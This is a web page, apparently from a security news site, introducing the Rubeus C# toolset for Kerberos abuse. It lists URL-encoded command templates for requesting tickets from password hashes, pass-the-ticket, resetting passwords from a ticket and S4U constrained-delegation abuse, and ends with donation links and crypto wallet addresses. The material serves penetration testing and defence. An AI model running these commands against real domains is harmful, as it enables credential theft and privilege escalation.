Rubeus

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy’s Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX‘s MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work, this project would not exist.

Rubeus also uses a C# ASN.1 parsing/encoding library from Thomas named DDer that was released with an “MIT-like” license. Huge thanks to Thomas for his clean and stable code!

The KerberosRequestorSecurityToken.GetRequest method for Kerberoasting was contributed to PowerView by @machosec.

Usage

Retrieve a TGT based on a user hash, optionally applying to the current logon session or a specific LUID:

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20asktgt%20%2Fuser%3AUSER%20%3C%2Frc4%3AHASH%20%7C%20%2Faes256%3AHASH%3E%20%5B%2Fdomain%3ADOMAIN%5D%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D%20%5B%2Fptt%5D%20%5B%2Fluid%5D”/]

Retrieve a TGT based on a user hash, start a /netonly process, and to apply the ticket to the new process/logon session:

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20asktgt%20%2Fuser%3AUSER%20%3C%2Frc4%3AHASH%20%7C%20%2Faes256%3AHASH%3E%20%2Fcreatenetonly%3AC%3A%5CWindows%5CSystem32%5Ccmd.exe%20%5B%2Fshow%5D%20%5B%2Fdomain%3ADOMAIN%5D%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D”/]

Renew a TGT, optionally applying the ticket or auto-renewing the ticket up to its renew-till limit:

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20renew%20%3C%2Fticket%3ABASE64%20%7C%20%2Fticket%3AFILE.KIRBI%3E%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D%20%5B%2Fptt%5D%20%5B%2Fautorenew%5D”/]

Reset a user’s password from a supplied TGT (AoratoPw):

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20changepw%20%3C%2Fticket%3ABASE64%20%7C%20%2Fticket%3AFILE.KIRBI%3E%20%2Fnew%3APASSWORD%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D”/]

Retrieve a service ticket for one or more SPNs, optionally applying the ticket:

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20asktgs%20%3C%2Fticket%3ABASE64%20%7C%20%2Fticket%3AFILE.KIRBI%3E%20%3C%2Fservice%3ASPN1%2CSPN2%2C…%3E%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D%20%5B%2Fptt%5D”/]

Perform S4U constrained delegation abuse:

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20s4u%20%3C%2Fticket%3ABASE64%20%7C%20%2Fticket%3AFILE.KIRBI%3E%20%2Fimpersonateuser%3AUSER%20%2Fmsdsspn%3ASERVICE%2FSERVER%20%5B%2Faltservice%3ASERVICE%5D%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D%20%5B%2Fptt%5D%0ARubeus.exe%20s4u%20%2Fuser%3AUSER%20%3C%2Frc4%3AHASH%20%7C%20%2Faes256%3AHASH%3E%20%5B%2Fdomain%3ADOMAIN%5D%20%2Fimpersonateuser%3AUSER%20%2Fmsdsspn%3ASERVICE%2FSERVER%20%5B%2Faltservice%3Acifs%2CHOST%2C…%5D%20%5B%2Fdc%3ADOMAIN_CONTROLLER%5D%20%5B%2Fptt%5D”/]

Submit a TGT, optionally targeting a specific LUID (if elevated):

[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”Rubeus.exe%20ptt%20%3C%2Fticket%3ABASE64%20%7C%20%2Fticket%3AFILE.KIRBI%3E%20%5B%2Fluid%3ALOGINID%5D”/]

More…

Download

Copyright (c) 2018, Will Schroeder
All rights reserved.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy